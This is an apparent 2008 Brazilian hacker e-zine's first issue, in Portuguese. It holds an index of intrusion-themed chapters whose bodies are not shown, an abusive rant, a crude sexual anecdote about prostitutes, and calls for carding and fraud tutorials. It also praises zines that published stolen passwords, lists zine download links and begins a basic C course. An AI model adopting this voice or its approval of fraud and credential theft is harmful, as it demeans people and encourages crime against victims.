===============================================================================
===============================================================================
||XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX||
||XXXXXXXXXXXXXXXXXXX VIPER CORP APRESENTA XXXXXXXXXXXXXXXXXXXXXXX||
||$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$||
||$$$$$$$$$[[[+ ================================================== +]]]]$$$$$$$$$$$$|| ||$$$$$$$$$[[[+ +]]]]$$$$$$$$$$$$||
||$$$$$$$$$[[[+ +]]]]$$$$$$$$$$$$||
||$$$$$$$$$[[[+ -[+]--------------------------------[+]- +]]]]$$$$$$$$$$$$||
||$$$$$$$$$[[[+ C.O.D.E +]]]]$$$$$$$$$$$$||
||$$$$$$$$$[[[+ +]]]]$$$$$$$$$$$$||
||$$$$$$$$$[[[+ COMPUTADORES - ORGASMO - DESTRUIÇÃO - E-ZINES +]]]]$$$$$$$$$$$$||
||$$$$$$$$$[[[+ [As 4 coisas que eu mais gosto na vida] +]]]]$$$$$$$$$$$$||
||$$$$$$$$$[[[+ +]]]]$$$$$$$$$$$$||
||$$$$$$$$$[[[+ -[+]--------------------------------[+]- +]]]]$$$$$$$$$$$$||
||$$$$$$$$$[[[+ +]]]]$$$$$$$$$$$$||
||$$$$$$$$$[[[+ [AINDA NÃO TENHO UM BANNER] +]]]]$$$$$$$$$$$$||
||$$$$$$$$$[[[+ +]]]]$$$$$$$$$$$$||
||$$$$$$$$$[[[+ MANDE SEUS ASCIIs PARA <B-FOX@BOL.COM.BR> +]]]]$$$$$$$$$$$$||
||$$$$$$$$$[[[+ +]]]]$$$$$$$$$$$$||
||$$$$$$$$$[[[+ +]]]]$$$$$$$$$$$$||
||$$$$$$$$$[[[+ ==================================================== +]]]]$$$$$$$$$$$$|| ||XXXXXXXXXXXXXXXXANO 1 - Nº00 1/1/2008 BY 6_BL4CK9_F0X6 XXXXXXXXXXXXXXXXXXX||
||XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX||
===============================================================================
===============================================================================
[+ ======X============X===============X===== +]
INDICE
[+ ======X============X===============X===== +]
############################################################################################ [Uma grande parte dos capitulos desta primeira ediçao da CODE foram escritos originalmente]
[para o maldito forum Darkers no qual fui banido, dae resolvi escrever uma zine com meus txts que escrevi la]
#include <x00. Pra começar reeves......................................................................................./6_Bl4ck9_f0x6
#include <x01. Frases do dia................................................................................................/6_Bl4ck9_f0x6
#include <x02. Palavras do autor........................................................................................../6_Bl4ck9_f0x6
#include <x03. Pedidos para os camaradas.........................................................................../6_Bl4ck9_f0x6
#include <x04. Introducao a Zine>......................................................................................../6_Bl4ck9_f0x6
#include <x05. ESPECIAL C.O.D.E [Zines de ontem e de hoje]........................................../6_Bl4ck9_f0x6
#include <x06. Curso de linguagem C.................................................................................../6_Bl4ck9_f0x6
#include <x07. Entendendo o Three Way Handshake.........................................................../6_Bl4ck9_f0x6
#include <x08. Tunelando conexões - Port redirect - Criando ponte para invasoes................/6_Bl4ck9_f0x6
#include <x09. Metasploit Unix>........................................................................................../6_Bl4ck9_f0x6
#include <x10. Entendendo o Smurf...................................................................................../6_Bl4ck9_f0x6
#include <x11. The king of calculators................................................................................../6_Bl4ck9_f0x6
#include <x12. BackDoor Camuflagem for avast! antivirus>................................................../6_Bl4ck9_f0x6
#include <x13. Humor Hacker - Entrevista com Cheat Struck>............................................./Cheat Struck
#include <x14. Configurando o ettercap em modo shell e Hijacking de HTTP......................../6_Bl4ck9_f0x6
#include <x15. The End........................................................................................................./6_Bl4ck9_f0x6
############################################################################################
----- C4p1Tul0 00
[+] X======================================X +]
PRA COMEÇAR REEVES
[+] X======================================X +]
"REEVES" quero sinceramente que voce..............VA TOMAR NO CUUUUUUU SEU FILHO DA PUTA!!!!!
Meu Deus!!! E agora, eles tem o meu IP e nao vao ter piedade, Reeves!!! Tenha piedade!!. Ô mundo crueu, vou me matar.
[ Traduçao para a palavra raposa segundo o dicionario aurelio: ]
[Mamifero Carnivoro, pessoa manhosa, "esperta", "velhaca"]
Cai na real reeves, bah! Voce acha mesmo que apareceria com meu IP real no forum depois do começo desse clima tenso? Noops, nem a pau, vao fazendo D.D.O.S ae na minha ponte galera, ou melhor, na minha dupla ponte Huahauh Meu PC ta aqui, vem buscar ele reeves]
Ja ouviram falar no Proxy Hunter?
E esse mesmo, (lembra do Kevin? o melhor do mundo)
Pense bem antes de voce atacar meu suposto IP, voce pode ter serias dores de cabeça seu verme nojento
Estava na porra do darkers para aprender...E isso mesmo que voce leu:
APRENDER!!!!!!!!
naum sou o Linus torvalds nem o Kevin David M. ( to chegando la voodoo e Andre Amorim eheh) , ah! e o #phobia realmente se acha um guro nem sabendo o que é um proxy? ou era apenas ironia? Acho que ta mais para a primeira opçao. Como ja falei, so queria postar meus topicos e "aprender", so isso, afinal de contas que tipo de cara espelha um forum todo (capivara warchalking) para passar um mes lendo ele offline sem comer e sem dormir direito, sem fazer mais nada apenas para aprender sobre wirelles? Se estava nessa droga de forum é porque tenho fome de conhecimento, se sou detestado é porque sempre tem um idiota falando besteira e eu respondo a autura, pô galera, um pouquinho de compreensao ae. Que tipo de idiota baixaria o site do morimoto e todos os seus e-books com a esperança de ser melhor do que ele? Que tipo de mula le zines da THC (em alemao) com um puta dicionario na frente traduzindo cada palavra so para aprender? Que tipo de imbecil perderia tempo em um forum que as pessoas o detestam? Eu sou o idiota, estava querendo ajudar, foi por isso que nao quiz expor meu verdadeiro nick, seria criticado pelo resto da vida, por nao aguentar malditos lammers.
Sou apenas um garoto de 18 anos que tem muitos idolos, todos mechem com informatica, nunca fui um garoto normal, daqueles que sao fas do ronaldinho e tal, ao contrario de muitos admiro um cara quando ele é bom, faço questao de dizer:
Esse cara e melhor que eu.
Isso é um incentivo para mim, primeiro eu reconheço e depois tento correr atras, fico facinado com o gosto por coisas tecnicas que o drk tem, quase chorei quando li o seu artigo sobre chipsets. Pessoal, nao quero encrenca com voces, so queria que "nesse forum", todos me respeitasem como nos "outros que participo". Mas vi que nao da, repetindo:
"REEVES" quero sinceramente que voce..............VA TOMAR NO CUUUUUUU SEU FILHO DA PUTA!!!!!
----- C4p1Tul0 01
[+] X======================================X +]
FRASES DO DIA
[+] X====================================== X+]
"O pinto piou em baixo da pia. Ou era de baixo? "Redes Wireless é cú de bebo"
- Seu Antonio "Bebado" - 6_Bl4ck9_f0x6
COM na verdade é um exe? Quanto mais conhecimento voce tiver
Ser nao identificado Mais balas tera no tambor do revolver
Anonymous
"E' soh da uma sumidinha e o povo ja pensa que
nos tamo preso... =)"
- Cheat Struck
"Nao cometam os mesmos erros que cometi. "So pra preencher espaço" Esse negocio de ser hacker pode parecer 6_Bl4ck9_f0x6 excitante no principio, mas depois, quando
voce avalia o que fez, se lembra que so tem
Essa noite nao, queria eu tenho um modem uma vida para viver"
-Adam - Kevin Mitnick
----- C4p1Tul0 02
[+ ======X============X===============X===== +]
PALAVRAS DO AUTOR
[+ ======X============X===============X===== +]
Gostaram do indice? Eu chamo isso de artes plasticas Huahauh
Voces nao acreditariam se eu falase que aqui na minha cidade tem gente que derrete
Garrafas de refri (plastico) de dois litros para vender pros gringos (arte) Huahuhuah!! a peso de ouro.
Na minha cidade existem belas prostitutas, muito belas mesmo, sao da elite hauhauh, ficam la no calçadao da praia sentadinhas nos bancos esperando algum alemao olhar pra elas. Eu mesmo um dia desses estava andando de patins com uns amigos e afim de pegar umas prostitutas, dae cheguei em uma delas e disse:
Oi mossa, quanto que e o programa?
Ela olhou pra mim e disse:
Como e meu amigo? Voce esta me perguntando o que?
Ops, puta errada Hauhauhauhauh!!!!
A coisa ta tao feia aqui cara, que ninguem sabe mais nem distinguir mulher de verdade de puta, Fortaleza ta foda. Nao existe coisa melhor que comer uma puta "da elite", mesmo sem grana, sei la porque, deve ser porque eu nao tenho cara de alemao e sim de bandido com esse meu cavanhaque, e mulher gosta de bandido, as almas se identificam (puta com bandido Huahau) sabe. Sempre quando to de bobera vou dar uma vouta de patins la no calçadao com meus camaradas daqui, dae um dia desses cheguei num puta e disse:
Moça... desculpa, mas tu e boa d+ e eu vou direito ao ponto.
Diz pra mim se tua e puta ou santa. hauhauh!!!
Felizmente essa era puta, muuuuuuito gata, ce e loco tio, muito linda msm. Dae levei ele prum motelzinho de quinta aqui perto e fiz o que o meu extinto de macho manda. Cara, quando voce pega em uns peitoes daquele vei, voce ate esquece que tem computador....ta bom, num e tao facil assim esquecer....mas da uma ligeira sensaçao de esquecimento do mundo da informaçao. Meti a mao naqueles peitoes e fecheio o olho, puta merda, voce se sente o Linus torvalds (um de meus maiores idolos). Vamos continuar com a zine, ja deixei voces com agua na boca d+, se vinherem para Fortaleza algum dia gostaria de bater um papinho com os leitores da minha zine e apresentar meus amigos daqui, e obvio.... que vamos comer muitas putas da "elite", so vai se for da elite caras, as putas de 5 categoria num e minha praia, hauhauha Essas putas de posto sao cheias de doença e normalmente sao feias, mas as da elite alem de serem "gatas", "gostosas", "experientes" e "limpinhas", ainda tem muita grana pra bancar uma cerveja gelada pra gente na praia Hauhauhauh!! Tem uma puta aqui que se apaixonou por uma amigo meu, putz, ta feito... Mas tem um problema.... ele tem um modem (num quer nem saber) Huahuhuah.....
Bl4ck - Um bom conhecedor de putas
----- C4p1Tul0 03
[+ ======X============X===============X===== +]
PEDIDO PARA OS CAMARADAS
[+ ======X============X===============X===== +]
Cloudy,
Quero tua ajuda ae pra fazer o site da zine cara, material pra escrever e que nao falta por isso essa zine vai longe, gostaria que tu escrevese ae algum material sobre bots tambem véi. Tenho conta em varios hosts, sem propaga nem nada, so o site da zine. Ah! e se der tambem da um geito de entrevistar o drk "do forum" ehhe, mas antes pergunta pra ele se ele ta com raiva de mim, ÔÔÔÔÔ povo pra gostar de ter raiva de mim hauhauhauh!!!
Milorde,
(puta nick tosco, te que ficar te chamando de milorde é foda cara hauhau)
Escreve ae algum texto sobre carder vei, ou estelionatarismo hauah (essa palavra existe?), acredito que o cara que fudeu alguns malucos la no forum invaders tenha capacidade de fazer tutos mais show de bola que aqueles pdfs que li. Da preferencia pra carder viu cara :-).
MixMaster,
Escreve ae alguma coisa sobre "Macro" cara, tu manja pra caraio vei, me ajuda ae, sei que tu e ocupado, mas arruma um tempim ae, a galera precisa de voce :-).
N1N4,
Ainda ta com raiva de mim? Se nao tiver escreve ae aquele velho artigo sobre Cross Site Scripting que tu num manja nada pra zine, e por favor:
Desculpa!!!! eu num quiz dizer aquilo, desculpa, sou um trouxa mesmo.
Marcos,
Sera que nao rolaria uma entrevista contigo naum? Eim, Eim? O cara mais injustiçado do mundo, um dos melhores do Brasil e por isso um dos mais criticados. Prometo fazer perguntas inteligentes e que serao de interesse para todos, to de saco cheio de ouvir lammers dizendo que voce nao entende nada HauhUhauh!!! Da pra acreditar nisso? hauhauahuh!!! Prepara ae um bom tempo porque vai rolar muitas perguntas maneiras ;-)
Voodoo,
se algum dia voce bater o olho nesse zine escute o meu apelo:
Entrevista ae cara!!!!!!
Por favor veio, sou seu fa number one ehehhe. Quebra esse galho ae pra esse lammer aqui, qualquer coisa mail me :-)
----- C4p1Tul0 04 Introdução a zine
Fiz a C.O.D.E para tenta trazer outra vez os tempos de ouro das zines (a decada de 90) para o seculo 20, apesar de não ter participado da sena hacker desta década gosto muito de ler as zines deste periodo como a zine underground "Axur 05" a "RwX", "Phone 9", "NearZ", "Hack 'n Phreak", etc. Era maravilho quando existiam briga entre os grupos, quando um dos grupos escrivia mal sobre o outro e vice-versa em suas zines, sem contar que as zines escreviam senhas hackeadas da galera em suas edições como senhas de FTP, HTTP form, e até mesmo de SSH e telnet, além de dar as senhas mostravam como entrar nos servers já invadido "por eles" e colocavam varias informações úteis para os leitores.
Enfim, para quem estiver lento esta zine faço um apelo: por favor continuem o que a rapaziada da decada de 90 começaram, existem apenas algumas zines daquele tempo sendo escritas hoje, isso é uma pena, pois as mesmas sempre passaram boas informações e artigos interesantes. Vamos fazer da nossa decada, a decada de ouro para os futuros hackers brasileiros, não vamos deixar morrer a sena hacker Brasileira. Naquele tempo se um host hospedava um site hacker que estava supostamente representando perigo, os caras do HO mesmo o tiravam do ar, e os caras se vingavam e tal e postavam varias brejas para os leitores entrarem no tal servidor e detonarem tudo lá, antes era mais emocionante participar da sena hacker, mas infelizmente hoje em dia os caras não constumam relembrar o passado, esta tudo voutado ao modismo, os porcos dos lammers roubaram a sena e vivem de plagio.
Postei em meu site varias zines para vocês comprovarem o que eu estou falando (para quem não é desse tempo), os links vou passar mais adiante, vocês vão ficar abismados em saber como a sena hacker era forte nesse tempo, você vão se sentir nesta decada e vão ver que muitos hacker de hoje não passavam de script kiddies desta época escrevendo suas zines. O cara que criou a sena hacker no Brasil se chama Derneval R. R. da Cunha com sua zine barata eletrica que é uma das poucas zines de ontem que ainda está sendo escrita hoje.
A C.O.D.E é uma zine dedicada a rapaziada que ta começando, não não, não me interprete mal, não quiz dizer lammers, "quiz dizer a rapaziada que ta começando", existe uma grande diferença entre lammers e bgners, os lamas são a escoria da sociedade, enquanto os bgners são aqueles caras que são interesados que não gostam de sair falando pra todo mundo que é hacker apenas porque aprendeu a usar um keylogger, com o pouco que sabem não costumam sair fazendo merda. Um exemplo de lammer é aquele idiota que acaba de saber pra que o nessus serve e sai varrendo hosts como o do bando do Brasil e YOUTUBE, detesto lammers, tenho nojo de lammers e se você for um lammer está convidado a deletar essa zine, seu lixo nojento.
A Zine tem muito material F0r y0u bgner, espero que essa zine lhe ajude a aprender mais, pois escrevo ela unica e quase exclusivamente para passar conhecimento para você, porque gosto muito de ser ajudado e porque não ajudar alguém, não é mesmo? Enfim, a zine vai disponibilizar especiais sobre diversas linguagens de programação em que toda edição eu colocarei uma continuação até terminá-la (isso que dizer que a zine pretende ir lonje), a primeira linguagem abordada é o perl, mas esperem ae,
estava tao afoito para lançar a primeira edicao da code que nem terminei, mas na proxima eu prometo :-)
na proxima edição abordarei umas paginas sobre variaveis em perl e algumas outras coisinhas, perl e uma linguagem facil de ser absorvida pela massa. Também to escrevendo ae um curso de MS-Windows (melhor que o difunto do DOS, se algum filho da puta falar de DOS perto de mim vai levar um sopetao na cara) pra rapaziada interesada, e um curso de C para quem ja começou a pegar a coisa, pois nao tenho saco de começar do inicio, mas nessa ediçao a primeira parte ta muito explicativa eheh. O resto deixo vocês descobrirem por si só, boa leitura galera ;-)
6_Bl4ck9_f0x6
Email- b-fox@bol.com.br
MSN - ratao666@hotmail.com
----- C4p1Tul0 05
[+ ====================================== +]
ESPECIAL C.O.D.E
Zines de ontem e de hoje
[+ ====================================== +]
Galera, gostaria de dizer que não tenho todas as edições da maioria das zines citadas, pois uma grande parte é muito dificil de serem encontradas, por isso se você tem edições seguintes das descritas aqui por favor me mandem por email os links (b-fox@bol.com.br), eu agradecerei pois sou um grande colecionador de zines hacker e preacker, tenho zines de diversos paises, mas vou postar links apenas para as zines brasileiras.Vou começar postando ae o link do site do pessoal da thebug magazine, que é uma zine feita pelo pessoal das antigas e tem muito mateiral bom, também é uma zine que tem como meta trazer os tempos de ouro do hacking brasileiro.
[ --- The Bug! Magazine
_____ _ ___ _
/__ \ |__ ___ / __\_ _ __ _ / \
/ /\/ '_ \ / _ \ /__\// | | |/ _` |/ /
/ / | | | | __/ / \/ \ |_| | (_| /\_/
\/ |_| |_|\___| \_____/\__,_|\__, \/
|___/
[ M . A . G . A . Z . I . N . E ]
Data de lançamento: xx /xx / 2005
Link para download das ediçoes: www.thebugmagazine.org
Porque resolveram escrever esta zine:
*** Editorial de Lancamento ***
THE BUG MAGAZINE
[--- Por que mais outra zine?
Apos diversas dificuldades e um longo periodo sem atividade, o rfdslabs e
o Gotfault tomam a dianteira do que pretende-se resgatar uma das melhores epo-
cas do hacking no Brasil, a epoca das zines. Baseado nesse contexto resolvemos
lancar a nossa propria revista eletronica, a The Bug! Magazine. Uma publicacao
que pretende atingir o publico ligado a "hacking" e seguranca da informacao com
publicacoes, na medida do possivel, periodicas num intervalo de 6 meses.
A ideia principal do Gotfault e rfdslabs e' semear o conhecimento e crescer
a cena hacker nacional. O hacking no Brasil teve o seu auge em 97/98/99 com
uma serie de zines, listas e grupos comprometidos a estudar e divulgar as
ideias do ramo da seguranca da informacao, o mais interessante/excitante da
computacao.
==================================================================
[Essa é das antigas e é underground, por isso você tera informaões de peso]
[Minha preferida, se tiver mais numeros manda pra mim cara, por favor]
[Eu acho que tenho todas, porque tenho uma zine coletania chamada axur best (melhor do axur) que tem muuuitas paginas, nunca contei as ediçoes, mas manda ae pra mim :-)
-aa
-a-a -x -x -u -u -r -rr -000 -55555
-a -a -x -x -u -u -r-r -0 -0-5
-a a-a -x -u -u -rr -0 -0-5555
-a -a -x -x -u -u -r -0 -0 -5
-a -a-x -x -uuu uu -r -000 -5555
-- = = [AXUR 05 - DARK SIDE HACKERS - BRAZIL] = = --
~~~~ ~~ ~ ~~~~ ~~~~ ~~~~~~~ ~~~~~~
axur0500 -------------------- > http://www.hunterhacker.xpg.com.br/axur0500.zip
axur0501 -------------------- > http://www.hunterhacker.xpg.com.br/axur0501.zip
axur0502 -------------------- > http://www.hunterhacker.xpg.com.br/axur0502.zip
axur0503 -------------------- > http://www.hunterhacker.xpg.com.br/axur0503.zip
==================================================================
[RwX - Das antigas, muito maneira]
:::::::::::::::::::::::::::::::::::::::::::::::::::::::
::::::::""`````""::::::""`:.:`""::"`````"::'"```'.:::::
::::: .g#S$$$$$S#n .g#S$$ $$S#n. $$$S#s s#S$$$ :::::
::::: $$$$$$ $$$$$ $$$$$$ $$$ $$$$$$ . $$$ $$$ .:::::
::::: $$$$$$g$$$$$. $$$$$$ $$$ $$$$$$ :' $$g$$ .::::::
::::: $$$$$$ $$$$$$ $$$$$$ $$$ $$$$$$ ' $$$$ $$$$ ':::::
::::: $$$$$$ $$$$$ $$$$$$.$$$.$$$$$$ $$$$$ . $$$$$ :::::
::::: $S$$$$ $$$$ `S$$$$$$$$$$$$$S'.`S$$ : $$S'.:::::
:::::.......:.....:::.............:::....:::....:::::::
:::::::::::::::::::::::::::::::::::::::::::::::::::::::
rwx-0 -------------------- > http://www.hunterhacker.xpg.com.br/rwx-0.zip
rwx-1 -------------------- > http://www.hunterhacker.xpg.com.br/rwx-1.zip
rwx-2 -------------------- > http://www.hunterhacker.xpg.com.br/rwx-2.zip
rwx-3 -------------------- > http://www.hunterhacker.xpg.com.br/rwx-3.zip
rwx-4 -------------------- > http://www.hunterhacker.xpg.com.br/rwx-4.zip
rwx-5 -------------------- > http://www.hunterhacker.xpg.com.br/rwx-5.zip
rwx-6 -------------------- > http://www.hunterhacker.xpg.com.br/rwx-6.zip
==================================================================
P h o n e 9 (c) 1 9 9 8 p r o d u c t i o n s
reg - (r) none rights reservaded.
__
__/\______\ \_ ________ ________ _______ ___/\_
\__ // \/ \__\___ /____\__ _/ _ \
// -- / [-]\ __/ \ /_ / /_____\___. /
_/ ___/___/ \_ __/\____/ /______ /__/ //
\/----/ /_____\\___/ //____/ /____\____/
[c] P h o n e 9 (c) p r o d u c t i o n s.
phone9-00 -------------------- > http://www.hunterhacker.xpg.com.br/phone9-00.zip
phone9-01 -------------------- > http://www.hunterhacker.xpg.com.br/phone9-01.zip
phone9-02 -------------------- > http://www.hunterhacker.xpg.com.br/phone9-02.zip
==================================================================
OS EDITORES DESTA ZINE SAO HACKERS DE SANGUE PURO
UNDERGROUND PURIIIISSSSSIIIMOOOO!!!
+-+-+-+-+-+-+-+-+-+-+----+-+-+-+-+-+-+-+-+-+-+-+
Este documento pode conter informacoes ilegais
ou somente para fins *EDUCATIVOS*. Se usa-las
para *OUTROS* fins a responsabilidade sera sua
+-+-+-+-+-+-+-+-+-+-+----+-+-+-+-+-+-+-+-+-+-+-+
=-= Near(Z) =-=-=-=-= TheGhostObtruder =-=-=-=-= TheRevenge =-=-=-=-=-=-=-=-=-
00 ³ú úúú.úúúúúú úú.ú úúúúú úú.úúúú ú.úúúú.úúúú úúúú.úúú úúúú.úúúú ú.úú
ÄÄÄͼú.úúú úÅXÅxú .úú `úúú,ú ú.úú úúúú,úúúú úú.ú.ú.úúú úú,úúú`úú úú.úúúúú
úúú ,úúxÅXÅxúúúú.úÅXÅúúú úúú.úú úúú úúúXÅxÅxúúúú úúú.úúú úúú.úúúú.úúú
úúúú.úú.úúÅxÅxÅXú. úúxÅxúúúÉÊÍËÍÊÍËÍÊú úÅxÅxÅxÅXÅúúúÎÁÍÂÍÁÍ¿úúú., úúúúú
. úúúúúúXÅxúxÅxú.ú ÅxÅúú͹. .úú ú.úúúÅxÅú .ú ÅxÅúÄÅÄ.úú.úÌÄú. ú`ú .úúúúú
.úúúúúú .úÅxÅ`úXÅx úúXÅxú.úÌÍú.ú,ú.ú úúxÅX,úú.úxÅXú.Ìú., úúÅÄúúúú ú.,úúú
ú.úú, úúúxÅXúúúxÅXú.ÅxÅúú͹úúúúúúú. úúÅxÅúú. úÅxÅúÄÅúú .úúÌÄú`úú úú úúú.úú
úú úú.úúÅxÅúú.úxÅxúxÅXúú.ÌÍÊÍËÍÊúú.úúxÅxÅXÅxÅXÅxúúÎÄÍÂÍÁÂÅúú úú.ú úúúú
úúúú.úú úúúxÅxú úúúXÅxÅxÅúú.ÌÍúú .ú úúúúÅXÅxÅxÅxÅxÅúÄÅ `úú ÌÄú.úú,úú
úúúúú, úúÅXÅúú.ú úxÅXÅxúú͹. ú.úúúú.úúxÅxú .úúxÅXúúÌÄúú,úÅÄ` ú.úú
úú.úúxÅxú`ú ,úúxÅxÅ`ú.ÌÍú`úú,.úúúúÅxÅú`ú.úÅxÅúÄÅú úúúÌÄú.úúú úú.ú
úúú.ú úúúÅXÅ ú.úú .úxÅXúúúÈËÍÊÍËÍÊÍËúúXÅx,.ú úXÅxúúÌÄúú,úÀ¿úúú.,úúú.úú
úú,. úúúú.úú ú,úúú.úúúúúú .úúú` ú.úú úúúú.úúúúúú ú.úúúúúú`úúúúú.
úú.úú ú úú.úú úú.úúúú ú. úú ú.úú,úú úúú.úúúúú.ú úúú úúú.ú úúúú.úúúú
=-= Near(Z) =-=-=-=-=-=-=-=-=-= issue 00 =-=-=-=-=-=-=-=-=-=-=-=-= Near(Z) =-=
nz00 -------------------- > http://www.hunterhacker.xpg.com.br/nz00.zip
nz01 -------------------- > http://www.hunterhacker.xpg.com.br/nz01.zip
nz02 -------------------- > http://www.hunterhacker.xpg.com.br/nz02.zip
nz03 -------------------- > http://www.hunterhacker.xpg.com.br/nz03.zip
nz04 -------------------- > http://www.hunterhacker.xpg.com.br/nz04.zip
nz05 -------------------- > http://www.hunterhacker.xpg.com.br/nz05.zip
nz06 -------------------- > http://www.hunterhacker.xpg.com.br/nz06.zip
nz07 -------------------- > http://www.hunterhacker.xpg.com.br/nz07.zip
nz08 -------------------- > http://www.hunterhacker.xpg.com.br/nz08.zip
nz09 -------------------- > http://www.hunterhacker.xpg.com.br/nz09.zip
nz10 -------------------- > http://www.hunterhacker.xpg.com.br/nz10.zip
==================================================================
[Agosto de 1997]
°°°°--------------------------------------------------------------------°°°°
±±±± ±±±±
²²²² ²²²²
ÛÛÛÛ H A C K N' P H R E A K ÛÛÛÛ
²²²² ²²²²
±±±± ZINE ±±±±
°°°°--------------------------------------------------------------------°°°°
hacphr00 -------------------- > http://www.hunterhacker.xpg.com.br/hacphr00.zip
hacphr01 -------------------- > http://www.hunterhacker.xpg.com.br/hacphr01.zip
hacphr02 -------------------- > http://www.hunterhacker.xpg.com.br/hacphr02.zip
hacphr03 -------------------- > http://www.hunterhacker.xpg.com.br/hacphr03.zip
==================================================================
[Data da primeira edição /03/2000]
_ __ ___________________________ __________________________ ____
\ ______ _ _______ _______ \___ _______by_Cheat_Struck__/
/ /_ ____ ________ _____ / / /___ ____ ____ ____
/ / _ \__ __/ _ \/ / /_ / _ \ _ \ \ _ \
/ _ / / _ / /__ / / _ / _ / _/ / _ /
__/ / __/ / / __/______\____/ / _\ / _\____/ / _\
)/ )/ )/ )/ )/ )/
' ' ' ' ' '
f3-00 -------------------- > http://www.hunterhacker.xpg.com.br/f3-00.zip
f3-01 -------------------- > http://www.hunterhacker.xpg.com.br/f3-01.zip
f3-02 -------------------- > http://www.hunterhacker.xpg.com.br/f3-02.zip
f3-03 -------------------- > http://www.hunterhacker.xpg.com.br/f3-03.zip
f3-04 -------------------- > http://www.hunterhacker.xpg.com.br/f3-04.zip
f3-05 -------------------- > http://www.hunterhacker.xpg.com.br/f3-05.zip
f3-06 -------------------- > http://www.hunterhacker.xpg.com.br/f3-06.zip
f3-07 -------------------- > http://www.hunterhacker.xpg.com.br/f3-07.zip
f3-08 -------------------- > http://www.hunterhacker.xpg.com.br/f3-08.zip
f3-09 -------------------- > http://www.hunterhacker.xpg.com.br/f3-09.zip
Essas são apenas algumas zines galera, obviamente que postarei muito mais links de boas zines da decada de 90 para vocês nas proximas edições. Espero que tenham ouvido o meu apelo com relação a desenvolver novas zines, pois eu faço questão de divulgalas no meu site, estou pensando eu mudar de host, pois o XPG tem muitas propagandas dae num rola vocês ter que ficar vendo muitos banners que num é do site, sem contar que o espaço pra pagina do site fica meio pequeno pra tantas propagandas, estou pensando em ir para a webng pois não tem propaga. Atualmente não estou escrevendo mais para o meu site e não estou postando mais conteúdo, você vão ver ele do jeito que esta por um bom tempo. Vou me dedicar apenas a C.O.D.E de agora em diante, mas se eu resolver mesmo mudar de host eu vou começar a atualizar ele.
----- C4p1Tul0 06
[+ ======X============X===============X===== +]
CURSO DE LINGUAGEM C PARTE 1
[+ ======X============X===============X===== +]
Bem galera, aqui e a primeira parte do curso de C, nao vou falar da historia do C, nem dessas babozeiras que voce esta acostumado a ler por ae, pois a intençao aqui é botar a mao na massa e explicar com se fazer a coisa e nao mostrar tecnicamente como a coisa acontece no sistema.....?.....Bah! Nao sei explicar direito, mas vamos la. Gostaria de dizer que este curso é o basico e é destinado a quem ja tem um certo conhecimento em C, e de vez em quando vou dar uma colher de cha para os iniciantes, ou seja, voce vera coisas de facil compreensao e muuuita explicaçao "algumas vezes".
00 - Incluir o que?
Antes de voce declarar uma funçao em C (o que? nao sabe o que e funçao? Procura em outro lugar, aqui eu so ensino a botar a mao na massa) voce precisa primeiramente incluir ela no seu programa....dã....essas tais funçoes estao localizadas nas bibliotecas de cabeçalho ou headers (cabeçalho em ingles), caso nao inclua as bibliotecas que abrigam as funçoes, voce nao poderá usar tais funçoes, exemplo.
Para incluir a funçao printf ("falarei log mais"), tu teras que fazer isso:
#include <stdio.h> //Essa e a biblioteca de cabeçalho que guarda a funçao printf
int main (void){
printf ("Oi"); //Funçao printf declarada, so pudi declarar essa funçao porque especifiquei la em cima o header stdio
return (0);}
Para nos podermos utilizar a funçao printf nos temos que primeiramente "incluir" no nosso codigo a biblioteca que guarda essa funçao, resumindo:
Tu so poderas declarar uma funçao se primeiramente incluir a biblioteca que guarda a funçao, sacou?
vou repetir:
Tu so poderas declarar uma funçao se primeiramente incluir a biblioteca que guarda a funçao!!!
Para incluir uma biblioteca ou header, tu teras que escrever o seguinte:
#include <nome_da_biblioteca>
Repare no #include, é include mesmo pessoal, include significa incluir em portugues, nao se esqueça de colocar a tralha antes do include, assim o compilador vai saber o quando voce esta dalacrando o include. Agora repara la em cima na biblioteca stdio.h, pois é, essa é a biblioteca padrao do C, antes de começar qualquer programa em C tu teras primeiro que incluir esta biblioteca, uma grande parte das funçoes "mais usadas nos programas" está contida nesta biblioteca. Vamos agora a uma traduçao deste header.
Contraçao Significado em ingles Significado em Portugues
std Standard Padrao
i Input Entrada
o Output Saida
.h .Header .Cabeçalho
O h denominda um C Header File ou arquivo de cabeçalho em C, como o txt é um arquivo de texto por exemplo, entao vamos dar uma resumida aqui, stdio.h significa: Cabeçalho padrao de entrada e saida. Torno a repetir, antes de começar escrever seus codigos inclua esta biblioteca, caso contrario nao poderas incluir as funçoes mais importantes do C (falarei logo mais) que estao incluidas neste cabeçalho, e para incluir use o #include <... :-)
Analisando outra vez o codigo
#include <stdio.h> //Incluir no codigo a biblioteca stdio.h que contem a funçao printf
int main (void)
{
printf ("Oi"); //Declarei a funçao printf, pois acima incluir a biblioteca stdio.h que contem esta funçao :0)
return (0);
}
Repara agora no "main", o main é a funçao principal do C, é abaixo dela que os codigos "começaram" a ser executados, nao importa o que tem pra traz ou mais para baixo, ele sempre vai começar a execuçao dos codigos abaixo desta funçao, que podera conter chamadas para outras funcoes. A funçao printf exibe coisas na tela, e como se fosse um echo em batch, no meu exemplo a "funçao" printf escreve a string Oi na tela.
Declarei a funcao main como inteira (int), ou seja, ela retorna uma inteiro [Nas proximas ediçoes falarei mais sobre return ;-)] e na lista de argumentos coloquei void, que significa vazio. Void e um tipo sem tipo, ele esta ali simplesmente para dizer que nao existem argumentos para a funcao main. O return (0) foi usado para fechar o programa. De uma olhada no code outra vez e rapare que os codigos em C sempre esta dentro de chaves, elas sao usadas para abrir "{" e fechar "}" o bloco de codigo, como no HTML e utilizada a tags de abertura <head> e as tags de fechamento </head>. Vamos ao exemplo do comando "for" agora.
======================================
MAIL BOX NO MEIO NO CURSO DE C
Entendeu a piada? Mail no meio hauhauHUhuh!!!
=======================================
